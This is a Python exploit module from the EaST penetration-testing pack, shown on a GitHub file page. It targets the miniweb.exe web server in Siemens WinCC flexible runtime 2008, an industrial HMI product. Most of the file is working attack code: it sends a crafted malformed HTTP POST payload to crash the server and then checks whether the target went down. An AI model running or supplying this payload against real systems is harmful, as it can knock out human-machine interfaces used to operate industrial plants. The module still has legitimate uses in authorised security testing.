Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
102 lines (90 sloc) 3.5 KB
#!/usr/bin/env python
# The exploit is a part of EaST pack - use only under the license agreement
# specified in LICENSE.txt in your EaST distribution
import sys
import time
import socket
sys.path.append("./core")
from Sploit import Sploit
INFO = {}
INFO['NAME'] = "ef_wincc_miniweb_dos"
INFO['DESCRIPTION'] = "Siemens WINCC flixible runtime 2008 SP2 + SP 1, miniweb.exe Denial of Service"
INFO['VENDOR'] = "http://www.automation.siemens.com/mcms/human-machine-interface/en/visualization-software/wincc-flexible/wincc-flexible-runtime/Pages/Default.aspx"
INFO["CVE Name"] = "?"
INFO["NOTES"] = """
Reference --> http://aluigi.altervista.org/adv/winccflex_1-adv.txt section E]
Form vendor:
WinCC flexible is ideal for use as a Human Machine Interface (HMI) in
any machine or process-level application in plant, machine and
series-machine construction. WinCC flexible is designed for all sectors
of industry and offers engineering software for all SIMATIC HMI
operator panels, from the smallest Micro Panel to the Multi Panel, as
well as runtime visualization software for PC-based single-user systems
running under Windows XP / Windows 7.
miniweb.exe is a small webserver that listens on 80 and 443 ports by
default.
miniweb.exe is affected by a vulnerability that allows an attacker to
crash the server while it handle the HTTP POST request.
ag_wincc_miniwebdos.py allowing attackers to crash the miniweb.exe
Tested against Siemens WINCC flixible runtime 2008 SP2 + SP 1, WinXP Sp3 Eng.
"""
INFO['CHANGELOG'] = "18 Aug, 2015. Written by Gleg team."
INFO['PATH'] = 'Exploits/'
# Must be in every module, to be set by framework
OPTIONS = {}
OPTIONS["HOST"] = "127.0.0.1"
OPTIONS["PORT"] = "80"
class exploit(Sploit):
def __init__(self, host = "", port = 0, logger = None):
Sploit.__init__(self, logger = logger)
self.name = INFO['NAME']
self.host = host
self.port = port
self.ssl = None
self.state = "running"
return
def args(self):
self.args = Sploit.args(self, OPTIONS)
self.host = self.args.get('HOST', self.host)
self.port = int(self.args.get('PORT', self.port))
return
def chk(self):
try:
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((self.host, self.port))
except:
self.log("check reported no open socket")
return 1
self.log("check reported that service is steel alive")
return 0
def makesploit(self):
return 'POST \xfa\x01\x01\x01\x45\x40\x40\x41 HTTP/1.0\r\n\r\n'
def run(self):
self.args()
self.log("Attacking {}".format(self.host))
try:
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((self.host, self.port))
client.sendall(self.makesploit())
client.close()
self.log('Data sent')
time.sleep(15)
self.log('Check target')
if self.chk():
self.finish(True)
return 1
else:
self.finish(False)
return 0
except:
self.log("failed!")
self.finish(False)
return 0
if __name__ == '__main__':
"""
By now we only have the tool mode for exploit..
Later we would have standalone mode also.
"""
print "Running exploit %s .. " % INFO['NAME']
e = exploit('', 80)
e.run()